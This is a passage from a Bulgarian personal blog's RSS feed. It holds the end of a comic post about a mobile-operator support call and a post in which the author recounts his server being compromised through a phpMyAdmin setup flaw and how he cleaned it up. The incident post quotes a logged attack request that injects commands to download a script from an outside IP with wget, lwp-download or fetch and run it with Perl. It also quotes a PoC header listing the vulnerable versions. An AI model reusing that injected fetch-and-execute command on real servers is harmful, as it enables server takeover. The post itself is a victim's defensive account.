<p>Девойката: Сега ще проверя, господине &#8230;</p>
<p>(On hold за 20 минути)</p>
<p>Девойката: Съжалявам за забавянето, но &#8230;</p>
<p>АЗ: &#8230; ви хвърлих в Jazz-a?</p>
<p>Девойката: Да. До колкото разбрах не предлагаме такава услуга &#8230;</p>
<p>АЗ: От мене да знаете, че предлагате &#8230; Въпроса е дали си плащам.</p>
<p>Девойката: Не знам, господине &#8230;</p>
<p>АЗ: Добре &#8230; имате достъп до таксуванията на номера ми, нали?</p>
<p>Девойката: Да?</p>
<p>АЗ: Отворете ги.</p>
<p>Девойката: Дайте си номера &#8230;</p>
<p>АЗ: 0878хххххх</p>
<p>Девойката: Но те се опресняват на 3 часа, господине &#8230; Последното ви е от 11:10 &#8230; ползване на интернет.</p>
<p>АЗ: Добре &#8230; показва ли се кога съм говорил с оператор?</p>
<p>Девойката: Да, господине. Провели сте разговор в 19:35 &#8230;</p>
<p>АЗ: След това не съм таксуван, нали?</p>
<p>Девойката: Не, господине.</p>
<p>АЗ: Добре, значи системата ви се е опреснила &#8230; щом е отчела обаждането на оператор и след него не съм таксуван, следователно не ме таксувате за тези SMS-и &#8230;</p>
<p>Девойката: Логиката ви е безупречна господине &#8230; но отново ви казвам, че не предлагаме такава услуга &#8230;</p>
<p>АЗ: А от мен  да знаете &#8230; че всъщност предлагате &#8230; Благодаря ви и лека вечер!</p>
<p>***</p>
<p>Много се забавлявам понякога в Вивакомци &#8230; Много са ми забавни &#8230; Поддръжката им явно има някакъв минимален запас от познания и им е трудно да импровизират върху тях &#8230;</p>
<p><br class="spacer_" /></p>
<p>Ваш,</p>
<p>Lucifer</p>
]]></content:encoded>
			<wfw:commentRss>http://www.anavaro.com/blog/vivacom-malko-zabava/feed/</wfw:commentRss>
		<slash:comments>19</slash:comments>
		</item>
		<item>
		<title>Hacked &#8230;</title>
		<link>http://www.anavaro.com/blog/hacked/</link>
		<comments>http://www.anavaro.com/blog/hacked/#comments</comments>
		<pubDate>Thu, 03 Dec 2009 01:40:36 +0000</pubDate>
		<dc:creator>Lucifer</dc:creator>
				<category><![CDATA[blog]]></category>
		<category><![CDATA[geek time]]></category>
		<category><![CDATA[misk]]></category>
		<category><![CDATA[cron]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[phpMyAdmin]]></category>
		<category><![CDATA[server]]></category>
		<category><![CDATA[std]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[блог]]></category>
		<category><![CDATA[вирус]]></category>
		<category><![CDATA[линукс]]></category>
		<category><![CDATA[сървър]]></category>

		<guid isPermaLink="false">http://www.anavaro.com/blog/?p=468</guid>
		<description><![CDATA[Искам да се оплача &#8230; от собствената си глупост &#8230; и то много да се оплача &#8230; То бива бива да съм заблуден, ама като мене не бива. Ситуацията на кратко &#8211; сървъра ми беше хакнат! Дап, моето мило Анаваро! Беше заразен с IRC бот вирус. Нямаше много &#8220;мрежеви&#8221; поражения &#8230; защото машината слаба или [...]]]></description>
			<content:encoded><![CDATA[<p>Искам да се оплача &#8230; от собствената си глупост &#8230; и то много да се оплача &#8230;</p>
<p>То бива бива да съм заблуден, ама като мене не бива. Ситуацията на кратко &#8211; сървъра ми беше хакнат! Дап, моето мило Анаваро!</p>
<p>Беше заразен с IRC бот вирус. Нямаше много &#8220;мрежеви&#8221; поражения &#8230; защото машината слаба или аз съм я сложил калпаво, та вируса само се изпълняваше, вдигаше CPU-то на 100% и системата умираше &#8211; няма мрежа, няма нищо, а аз знаете съм на 500 км.</p>
<p>След няколко рестарт-а и любимите ми &#8220;<span style="font-family: terminal,monaco;">tail -f</span>&#8221; и &#8220;<span style="font-family: terminal,monaco;">htop</span>&#8221; успях да засека следния малък проблем:</p>
<pre style="margin-top: 0pt; display: inline;">ID    USER    NI  CPU%  MEM%   VIRT    SHR   S  TIME+     Command
3813  apache  0   65.0    0.1       1776   432    R   1:42.64   ./std 89.137.139.225 0</pre>
<p>А &#8230; ново 20??? Какъв пък процес се изпълнява от apache (Web Server-a) &#8230;</p>
<p>Спомних си кога за първи път се появи проблема и се зарових из логовете на индианеца &#8230; където открих следния &#8220;смахнат&#8221; ред:</p>
<pre>88.191.14.38 - - [29/Nov/2009:02:12:10 +0200] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20http://88.170.72.136/gcc.txt;lwp-download%20http://88.170.72.136/gcc.txt;fetch%20http://88.170.72.136/gcc.txt;perl%20gcc.txt;rm%20-fr%20gcc.txt HTTP/1.1" 200 181</pre>
<p>Изненадкааа &#8230;Разбира се разпищях се из Linux-bg и ми върнаха лошата за мен новина:</p>
<blockquote><address># PoC script successfully tested on the following targets:</address>
<address># phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1</address>
<address># Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)</address>
<address>
# attack requirements:</address>
<address># 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5</address>
<address># and 3.x before 3.1.3.1 according to PMASA-2009-3</address>
<address># 2) it *seems* this vuln can only be exploited against environments</address>
<address># where the administrator has chosen to install phpMyAdmin following</address>
<address># the *wizard* method, rather than manual method: <a href="http://snipurl.com/jhjxx" target="_blank">http://snipurl.com/jhjxx</a></address>
<address><strong># 3) administrator must have NOT deleted the &#8216;/config/&#8217; directory<br />
# within the &#8216;/phpMyAdmin/&#8217; directory. this is because this directory is<br />
# where &#8216;/scripts/setup.php&#8217; tries to create &#8216;config.inc.php&#8217; which is where<br />
# our evil PHP code is injected <img title="Cool" src="http://www.linux-bg.org/forum/Smileys/default/cool.gif" border="0" alt="8)" /></strong></address>
</blockquote>
<p>Бах! Как се саморазпосувах, само може да си представите! Правих какви ли не магарии &#8211; то не бяха преинсталации на apache, промени на пътеки &#8230;</p>
<p>Отново и отново ./std $IP $PORT процеса ме убиваше &#8230;</p>
<p>Питайки чичко Гугъл &#8230; случайно стигнах до един сайт в който някой се оплакваше от моя проблем.</p>
<pre>ps aux | grep apache</pre>
<p>ми даде виновника &#8211; индианеца се беше троянизирал &#8230; изпълняваше процеси (добре че е deamon) &#8230;</p>
<pre>crontab -u apache -e</pre>
<p>ми даде и проблема &#8211; някакво фаилче кръстено y2kupdate в /tmp/.pid/ и изпълнимо &#8230; на бързо му бих &#8220;rm -r&#8221;, премахнах референцията в cron-а и изтрих phpMyAdmin-a (сложих си го на скрито място) &#8230;</p>
<p>Знам, че съм пълен идиот &#8230; ама аз съм си такъв &#8230;</p>
<p>Ваш,</p>
<p>Lucifer</p>
]]></content:encoded>
			<wfw:commentRss>http://www.anavaro.com/blog/hacked/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

